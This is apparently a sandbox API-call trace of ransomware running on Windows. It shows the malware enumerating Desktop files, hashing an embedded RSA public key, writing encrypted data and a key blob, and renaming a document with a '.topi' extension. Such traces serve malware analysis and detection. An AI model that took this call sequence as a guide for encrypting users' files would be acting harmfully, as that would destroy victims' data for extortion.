[0095.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9720 | out: hHeap=0x680000) returned 1 [0095.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9720 [0095.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9720 | out: hHeap=0x680000) returned 1 [0095.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9750 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9738 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9708 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96f0 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f2388 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.936] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f72d8*, nNumberOfBytesToWrite=0x7cd9, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f72d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x7cd9, lpOverlapped=0x0) returned 1 [0095.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f72d8 | out: hHeap=0x680000) returned 1 [0095.937] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x7cde, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.937] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0095.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0095.937] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.937] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.937] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.937] CloseHandle (hObject=0x6a8) returned 1 [0095.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0095.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0095.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0095.939] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\u-kMkP.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\u-kmkp.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\u-kMkP.doc.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\u-kmkp.doc.topi")) returned 1 [0095.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.940] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0095.941] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bb63440, ftCreationTime.dwHighDateTime=0x1d5c0c1, ftLastAccessTime.dwLowDateTime=0x56a07fd0, ftLastAccessTime.dwHighDateTime=0x1d5b7cf, ftLastWriteTime.dwLowDateTime=0x56a07fd0, ftLastWriteTime.dwHighDateTime=0x1d5b7cf, nFileSizeHigh=0x0, nFileSizeLow=0x18d54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uSviczcPXuVf6fam0Lcc.jpg", cAlternateFileName="USVICZ~1.JPG")) returned 1 [0095.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0095.941] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0095.941] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0095.941] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\uSviczcPXuVf6fam0Lcc.jpg") returned=".jpg" [0095.941] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\uSviczcPXuVf6fam0Lcc.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\usviczcpxuvf6fam0lcc.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.941] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=101716) returned 1 [0095.941] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.944] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x18d2e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.944] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.945] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.945] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.945] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.945] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x18d54, lpOverlapped=0x0) returned 1 [0095.946] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.946] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.946] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.946] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.946] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0095.946] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.947] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.947] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.947] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.947] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.947] GetLastError () returned 0x0 [0095.947] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.947] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0095.947] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.947] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.947] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.947] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.947] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.947] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.947] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.947] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18d50) returned 0x9a06a00 [0095.947] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2388 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96f0 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f23d0 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9708 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9738 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9750 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.948] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9738 | out: hHeap=0x680000) returned 1 [0095.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9750 | out: hHeap=0x680000) returned 1 [0095.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9750 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9738 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9750 | out: hHeap=0x680000) returned 1 [0095.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9738 | out: hHeap=0x680000) returned 1 [0095.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0095.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.949] GetCurrentThreadId () returned 0x8c4 [0095.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f7150 [0095.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0095.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.949] GetCurrentThreadId () returned 0x8c4 [0095.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9738 [0095.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9750 [0095.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9720 [0095.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.951] 